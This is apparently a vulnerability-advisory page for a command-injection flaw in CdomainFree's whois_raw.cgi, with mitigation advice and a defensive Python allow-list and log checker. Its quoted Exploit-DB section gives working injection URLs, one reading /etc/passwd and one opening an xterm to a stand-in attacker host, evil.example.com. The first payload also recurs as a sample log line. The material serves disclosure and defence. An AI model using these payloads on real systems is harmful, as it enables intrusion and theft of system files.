Vendor: CdomainFree
By: SecurityFocus
CVSS: 8.8 (HIGH)
CWE: 78 (Command Injection)
Product Name: CdomainFree
Affected Version From: CdomainFree
Affected Version To: CdomainFree
Patch Exists: YES
Related CWE: CVE-2000-0240
CPE: o:cdomain:cdomainfree
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2000

Command Injection in CdomainFree

A vulnerability in the whois_raw.cgi program of CdomainFree allows remote malicious users to run any executable already present on the machine. The vulnerability is due to the program passing user input to the shell without proper filtering.

Mitigation:

Upgrade to the latest version of CdomainFree, or use CdomainPro, which connects to the whois servers directly.
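The flaw described above is an fqdn parameter that reaches a shell unfiltered, so a newline in the value starts a second command. The defensive fix is a strict allow-list on the parameter plus an argv-style process call (no shell), and the same allow-list doubles as a check over web-server access logs. This is an added example, not code from CdomainFree; the FQDN_RE pattern, the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list for a fully qualified domain name: RFC 1035 labels joined by dots.
# Newlines, spaces, ';', '|', '$' and other shell metacharacters never match,
# so such values are rejected before they reach any process.
FQDN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$",
    re.IGNORECASE,
)

def is_valid_fqdn(value):
    return bool(FQDN_RE.match(value))

def build_whois_argv(fqdn):
    """Argv list for the lookup, or ValueError. A list handed to subprocess
    without shell=True is never re-parsed by /bin/sh, so a %0A in the value
    cannot turn one command into two. The allow-list also rules out a leading
    '-', so the name cannot be mistaken for a whois option."""
    if not is_valid_fqdn(fqdn):
        raise ValueError("rejected fqdn parameter")
    return ["whois", fqdn]

# Constructed access-log lines (combined format) for the detection check.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2000:12:00:00 +0000] "GET /cgi-bin/whois_raw.cgi?fqdn=example.com HTTP/1.0" 200 512',
    '192.0.2.11 - - [10/Mar/2000:12:00:05 +0000] "GET /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.0" 200 512',
    '192.0.2.12 - - [10/Mar/2000:12:00:09 +0000] "GET /index.html HTTP/1.0" 200 1024',
]

def suspicious_fqdn_requests(log_lines):
    """Return (client, decoded fqdn) for whois_raw.cgi requests whose fqdn
    parameter is not a plain hostname after URL-decoding."""
    hits = []
    for line in log_lines:
        m = re.search(r'"GET (\S+)', line)
        if not m or "whois_raw.cgi" not in m.group(1):
            continue
        query = urlsplit(m.group(1)).query
        for raw in parse_qs(query, keep_blank_values=True).get("fqdn", []):
            if not is_valid_fqdn(raw):
                hits.append((line.split()[0], raw))
    return hits
```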
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/304/info

A vulnerability in a CGI program that is part of CdomainFree allows remote malicious users to run any executable already present on the machine.

The vulnerability is in the whois_raw.cgi program. This CGI passes user input to the shell without proper filtering. None of the Cdomain commercial versions (e.g. CdomainPro) are vulnerable, as they connect to the whois servers directly.

http://www.example.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.example.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20evil.example.com:0